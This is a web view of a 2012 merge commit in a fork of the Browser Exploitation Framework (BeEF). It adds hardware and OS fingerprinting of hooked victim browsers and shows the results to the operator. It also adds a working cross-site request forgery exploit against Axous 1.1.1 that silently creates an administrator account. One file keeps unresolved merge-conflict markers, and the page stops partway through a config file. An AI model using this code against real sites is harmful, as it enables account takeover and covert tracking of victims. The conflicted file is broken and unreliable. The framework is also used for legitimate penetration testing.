Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:beefproject/beef

Browse Source 
Conflicts:
	core/main/handlers/modules/beefjs.rb
This commit is contained in:
qswain2
2012-06-25 22:59:31 -04:00
parent 4f6d07bced 123b81b2b4
commit 8d8a0ca9e9
73 changed files with 1003 additions and 91 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.5-alpha
0.4.3.6-alpha

2
config.yaml
View File

@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.5-alpha'
version: '0.4.3.6-alpha'
debug: false
restrictions:

1
core/core.rb
View File

@@ -34,6 +34,7 @@ require 'core/main/constants/browsers'
require 'core/main/constants/commandmodule'
require 'core/main/constants/distributedengine'
require 'core/main/constants/os'
require 'core/main/constants/hardware'
# @note Include core modules for beef
require 'core/main/configuration'

10
core/filters/browser.rb
View File

@@ -47,6 +47,16 @@ module Filters
true
end
# Check the Hardware name value - for example, 'iPhone'
# @param [String] str String for testing
# @return [Boolean] If the string has valid Hardware name characters
def self.is_valid_hwname?(str)
return false if not is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return false if str.length < 2
true
end
# Verify the browser version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser version characters

17
core/main/client/browser.js
View File

@@ -551,6 +551,19 @@ beef.browser = {
},
/**
* Checks if the Phonegap API is available from the hooked domain.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasJava()) { ... }
*/
hasPhonegap: function() {
var result = false;
try { if (!!device.phonegap) result = true; else result = false; }
catch(e) { result = false; }
return result;
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -765,6 +778,7 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var hw_name = beef.hardware.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_size = beef.browser.getScreenSize();
@@ -772,6 +786,7 @@ beef.browser = {
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
@@ -789,6 +804,7 @@ beef.browser = {
if(hostport) details["HostPort"] = hostport;
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(hw_name) details['Hardware'] = hw_name;
if(date_stamp) details['DateStamp'] = date_stamp;
if(system_platform) details['SystemPlatform'] = system_platform;
if(browser_type) details['BrowserType'] = browser_type;
@@ -797,6 +813,7 @@ beef.browser = {
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
if(has_phonegap) details['HasPhonegap'] = has_phonegap
if(has_web_socket) details['HasWebSocket'] = has_web_socket
if(has_googlegears) details['HasGoogleGears'] = has_googlegears
if(has_activex) details['HasActiveX'] = has_activex;

74
core/main/client/hardware.js Normal file
View File

@@ -0,0 +1,74 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.hardware = {
ua: navigator.userAgent,
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
isIpad: function() {
return (this.ua.indexOf('iPad') != -1) ? true : false;
},
isIpod: function() {
return (this.ua.indexOf('iPod') != -1) ? true : false;
},
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
isBlackBerry: function() {
return (this.ua.match('BlackBerry')) ? true : false;
},
isZune: function() {
return (this.ua.match('ZuneWP7')) ? true : false;
},
isKindle: function() {
return (this.ua.match('Kindle')) ? true : false;
},
getName: function() {
if(this.isNokia()) {
if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
//return 'Nokia';
}
if (this.isWinPhone()) return 'Windows Phone';
if (this.isBlackBerry()) return 'BlackBerry';
if (this.isIphone()) return 'iPhone';
if (this.isIpad()) return 'iPad';
if (this.isIpod()) return 'iPod';
if (this.isKindle()) return 'Kindle';
return 'unknown';
}
};
beef.regCmp('beef.net.hardware');

20
core/main/client/os.js
View File

@@ -72,7 +72,11 @@ beef.os = {
isMacintosh: function() {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
@@ -97,6 +101,10 @@ beef.os = {
return (this.ua.match('BlackBerry')) ? true : false;
},
isWebOS: function() {
return (this.ua.match('webOS')) ? true : false;
},
isQNX: function() {
return (this.ua.match('QNX')) ? true : false;
},
@@ -139,11 +147,14 @@ beef.os = {
if(this.isSunOS()) return 'Sun OS';
//iPhone
if (this.isIphone()) return 'iPhone';
if (this.isIphone()) return 'iOS';
//iPad
if (this.isIpad()) return 'iPad';
if (this.isIpad()) return 'iOS';
//iPod
if (this.isIpod()) return 'iPod';
if (this.isIpod()) return 'iOS';
// zune
//if (this.isZune()) return 'Zune';
//macintosh
if(this.isMacintosh()) {
@@ -156,6 +167,7 @@ beef.os = {
//others
if(this.isQNX()) return 'QNX';
if(this.isBeOS()) return 'BeOS';
if(this.isWebOS()) return 'webOS';
return 'unknown';
}

73
core/main/constants/hardware.rb Normal file
View File

@@ -0,0 +1,73 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Constants
# @note The hardware's strings for hardware detection.
module Hardware
HW_UNKNOWN_IMG = 'pc.png'
HW_IPHONE_UA_STR = 'iPhone'
HW_IPHONE_IMG = 'iphone.jpg'
HW_IPAD_UA_STR = 'iPad'
HW_IPAD_IMG = 'ipad.png'
HW_IPOD_UA_STR = 'iPod'
HW_IPOD_IMG = 'ipod.jpg'
HW_BLACKBERRY_UA_STR = 'BlackBerry'
HW_BLACKBERRY_IMG = 'blackberry.png'
HW_ANDROID_UA_STR = 'Android'
HW_ANDROID_IMG = 'android.png'
HW_WINPHONE_UA_STR = 'Windows Phone'
HW_WINPHONE_IMG = 'win.png'
HW_ZUNE_UA_STR = 'ZuneWP7'
HW_ZUNE_IMG = 'zune.gif'
HW_KINDLE_UA_STR = 'Kindle'
HW_KINDLE_IMG = 'kindle.png'
HW_ALL_UA_STR = 'All'
# Attempt to match operating system string to constant
# @param [String] name Name of operating system
# @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched
def self.match_hardware(name)
case name.downcase
when /iphone/
HW_IPHONE_UA_STR
when /ipad/
HW_IPAD_UA_STR
when /ipod/
HW_IPOD_UA_STR
when /blackberry/
HW_BLACKBERRY_UA_STR
when /android/
HW_ANDROID_UA_STR
when /windows phone/
HW_WINPHONE_UA_STR
when /zune/
HW_ZUNE_UA_STR
when /kindle/
HW_KINDLE_UA_STR
else
'ALL'
end
end
end
end
end
end

20
core/main/constants/os.rb
View File

@@ -29,17 +29,19 @@ module Constants
OS_MAC_UA_STR = 'Mac'
OS_MAC_IMG = 'mac.png'
OS_QNX_UA_STR = 'QNX'
OS_QNX_IMG = 'qnx.ico'
OS_QNX_IMG = 'qnx.ico'
OS_BEOS_UA_STR = 'BeOS'
OS_BEOS_IMG = 'beos.png'
OS_BEOS_IMG = 'beos.png'
OS_OPENBSD_UA_STR = 'OpenBSD'
OS_OPENBSD_IMG = 'openbsd.ico'
OS_IOS_UA_STR = 'iOS'
OS_IOS_IMG = 'ios.png'
OS_IPHONE_UA_STR = 'iPhone'
OS_IPHONE_IMG = 'iphone.png'
OS_IPHONE_IMG = 'iphone.jpg'
OS_IPAD_UA_STR = 'iPad'
OS_IPAD_IMG = 'ipad.png'
OS_IPAD_IMG = 'ipad.png'
OS_IPOD_UA_STR = 'iPod'
OS_IPOD_IMG = 'ipod.jpg'
OS_IPOD_IMG = 'ipod.jpg'
OS_MAEMO_UA_STR = 'Maemo'
OS_MAEMO_IMG = 'maemo.ico'
OS_BLACKBERRY_UA_STR = 'BlackBerry'
@@ -65,12 +67,8 @@ module Constants
OS_BEOS_UA_STR
when /openbsd/
OS_OPENBSD_UA_STR
when /iphone/
OS_IPHONE_UA_STR
when /ipad/
OS_IPAD_UA_STR
when /ipod/
OS_IPOD_UA_STR
when /ios/, /iphone/, /ipad/, /ipod/
OS_IOS_UA_STR
when /maemo/
OS_MAEMO_UA_STR
when /blackberry/

16
core/main/handlers/browserdetails.rb
View File

@@ -118,6 +118,14 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
# get and store the hardware name
hw_name = get_param(@data['results'], 'Hardware')
if BeEF::Filters.is_valid_hwname?(hw_name)
BD.set(session_id, 'Hardware', hw_name)
else
self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
end
# get and store the date
date_stamp = get_param(@data['results'], 'DateStamp')
if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -222,6 +230,14 @@ module BeEF
self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasPhonegap
has_phonegap = get_param(@data['results'], 'HasPhonegap')
if BeEF::Filters.is_valid_yes_no?(has_phonegap)
BD.set(session_id, 'HasPhonegap', has_phonegap)
else
self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasGoogleGears
has_googlegears = get_param(@data['results'], 'HasGoogleGears')
if BeEF::Filters.is_valid_yes_no?(has_googlegears)

6
core/main/handlers/modules/beefjs.rb
View File

@@ -32,9 +32,15 @@ module Modules
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
<<<<<<< HEAD
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js websocket.js )
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
=======
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
>>>>>>> 123b81b2b47ce59c45d6e59e489b342b85a70a77
end
# @note construct the beefjs string from file(s)

29
core/main/models/browserdetails.rb
View File

@@ -62,7 +62,7 @@ module Models
browserdetails
end
#
# Returns the icon representing the browser type the
# hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +94,10 @@ module Models
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +106,26 @@ module Models
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end
#
# Returns the icon representing the hardware the
# zombie is running on (i.e. iPhone, BlackBerry)
#
def self.hw_icon(session_id)
ua_string = get(session_id, 'BrowserReportedName')
return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
end
end
end

32
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -136,7 +136,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
if not host_name.nil?
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
@@ -148,6 +148,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the hardware name
hw_name = BD.get(zombie_session, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
@@ -331,6 +346,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for hasPhonegap
has_phonegap = BD.get(zombie_session, 'hasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
if not has_googlegears.nil?

42
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -84,18 +84,38 @@ class Panel < BeEF::Extension::AdminUI::HttpController
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_phonegap = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasPhonegap')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
return {
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_icon' => browser_icon,
'os_icon' => os_icon
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_name' => browser_name,
'browser_version' => browser_version,
'browser_icon' => browser_icon,
'os_icon' => os_icon,
'os_name' => os_name,
'hw_icon' => hw_icon,
'hw_name' => hw_name,
'has_flash' => has_flash,
'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears,
'has_phonegap' => has_phonegap,
'date_stamp' => date_stamp
}
end

BIN
extensions/admin_ui/media/images/icons/ios.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 38 KiB

BIN
extensions/admin_ui/media/images/icons/iphone.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.7 KiB

BIN
extensions/admin_ui/media/images/icons/iphone.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 1.5 KiB

BIN
extensions/admin_ui/media/images/icons/kindle.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.3 KiB

BIN
extensions/admin_ui/media/images/icons/pc.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.5 KiB

BIN
extensions/admin_ui/media/images/icons/zune.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.7 KiB

51
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -20,18 +20,49 @@ var ZombiesMgr = function(zombies_tree_lists) {
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
text = "<img src='/ui/media/images/icons/"+escape(zombie_array[index]["browser_icon"])+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text += "<img src='/ui/media/images/icons/"+escape(zombie_array[index]["os_icon"])+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text += zombie_array[index]["ip"];
var ip = zombie_array[index]["ip"];
var session = zombie_array[index]["session"];
var browser_name = zombie_array[index]["browser_name"];
var browser_version = zombie_array[index]["browser_version"];
var browser_icon = zombie_array[index]["browser_icon"];
var os_icon = zombie_array[index]["os_icon"];
var os_name = zombie_array[index]["os_name"];
var hw_name = zombie_array[index]["hw_name"];
var hw_icon = zombie_array[index]["hw_icon"];
var domain = zombie_array[index]["domain"];
var port = zombie_array[index]["port"];
var has_flash = zombie_array[index]["has_flash"];
var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"];
var has_phonegap = zombie_array[index]["has_phonegap"];
var date_stamp = zombie_array[index]["date_stamp"];
text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= ip;
balloon_text = "IP: " + ip;
balloon_text+= "<br/>Browser: " + browser_name + " " + browser_version;
balloon_text+= "<br/>System: " + os_name;
balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Phonegap API: " + has_phonegap;
balloon_text+= "<br/>Date: " + date_stamp;
var new_zombie = {
'id' : index,
'ip' : zombie_array[index]["ip"],
'session' : zombie_array[index]["session"],
'text': text,
'check' : false,
'domain' : zombie_array[index]["domain"],
'port' : zombie_array[index]["port"]
'id' : index,
'ip' : ip,
'session' : session,
'text' : text,
'balloon_text' : balloon_text,
'check' : false,
'domain' : domain,
'port' : port
};
return new_zombie;

11
extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
View File

@@ -36,6 +36,7 @@ zombiesTreeList = function(id) {
//the tree node that contains the list of online hooked browsers
this.online_hooked_browsers_treenode = this.root.appendChild(
new Ext.tree.TreeNode({
qtip: "Online hooked browsers",
text:'Online Browsers',
cls:'online-zombies-node',
expanded:true
@@ -45,6 +46,7 @@ zombiesTreeList = function(id) {
//the tree node that contains the list of offline hooked browsers
this.offline_hooked_browsers_treenode = this.root.appendChild(
new Ext.tree.TreeNode({
qtip: "Offline hooked browsers",
text:'Offline Browsers',
cls:'offline-zombies-node',
expanded:false
@@ -183,7 +185,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
*/
addZombie: function(hooked_browser, online, checkbox) {
var hb_id, mother_node, node;
if(online) {
hb_id = 'zombie-online-' + hooked_browser.session;
mother_node = this.online_hooked_browsers_treenode;
@@ -193,7 +195,9 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
}
var exists = this.getNodeById(hb_id);
if(exists) return;
hooked_browser.qtip = hooked_browser.balloon_text;
//save a new online HB
if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) {
this.online_hooked_browsers_array.push(hooked_browser);
@@ -216,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new node for that hooked browser
node = new Ext.tree.TreeNode(hooked_browser);
//creates a sub-branch for that HB if necessary
mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox);
@@ -253,6 +257,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
sub_folder_node = new Ext.tree.TreeNode({
id: 'sub-folder-'+folder,
text: folder,
qtip: "Browsers hooked on "+folder,
checked: ((checkbox) ? false : null),
type: this.tree_configuration["sub-branch"]
});

30
extensions/console/lib/shellinterface.rb
View File

@@ -358,6 +358,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
hw_name = BD.get(self.targetsession, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
@@ -535,6 +550,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasPhonegap
has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
if not has_googlegears.nil?

2
extensions/evasion/evasion.rb
View File

@@ -37,10 +37,10 @@ module BeEF
#2. call the "execute" method of the ruby module, passing the input
#3. update the input in order that next technique will work on the pre-processed input.
if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
print_debug "[OBFUSCATION] Applying technique [#{technique}]"
klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
is_bootstrap_needed = klass.need_bootstrap
if is_bootstrap_needed
print_debug "[OBFUSCATION] Adding bootstrapper for technique [#{technique}]"
@bootstrap += klass.get_bootstrap
end
end

50
extensions/proxy/api.rb
View File

@@ -14,33 +14,33 @@
# limitations under the License.
#
module BeEF
module Extension
module Proxy
module API
module Extension
module Proxy
module API
module RegisterHttpHandler
module RegisterHttpHandler
BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
def self.pre_http_start(http_hook_server)
config = BeEF::Core::Configuration.instance
Thread.new{
http_hook_server.semaphore.synchronize{
BeEF::Extension::Proxy::Proxy.new
}
}
print_success "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
def self.pre_http_start(http_hook_server)
config = BeEF::Core::Configuration.instance
Thread.new{
http_hook_server.semaphore.synchronize{
BeEF::Extension::Proxy::Proxy.new
}
}
print_info "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
end
def self.mount_handler(beef_server)
beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
end
end
end
end
def self.mount_handler(beef_server)
beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
end
end
end
end
end
end

2
modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
View File

@@ -24,7 +24,7 @@ beef:
target:
working:
S:
os: ["iPhone"]
os: ["iOS"]
not_working:
ALL:
os: ["All"]

40
modules/exploits/axous_1_1_1_add_user_csrf/command.js Normal file
View File

@@ -0,0 +1,40 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var email = '<%= @email %>';
var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
{'type':'hidden', 'name':'user_name', 'value':username},
{'type':'hidden', 'name':'new_passwd', 'value':password},
{'type':'hidden', 'name':'new_passwd1', 'value':password},
{'type':'hidden', 'name':'email', 'value':email},
{'type':'hidden', 'name':'dosubmit', 'value':'1'} ,
{'type':'hidden', 'name':'id', 'value':''},
{'type':'hidden', 'name':'action', 'value':'addnew'} ,
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(axous_iframe);
}
setTimeout("cleanup()", 15000);
});

25
modules/exploits/axous_1_1_1_add_user_csrf/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
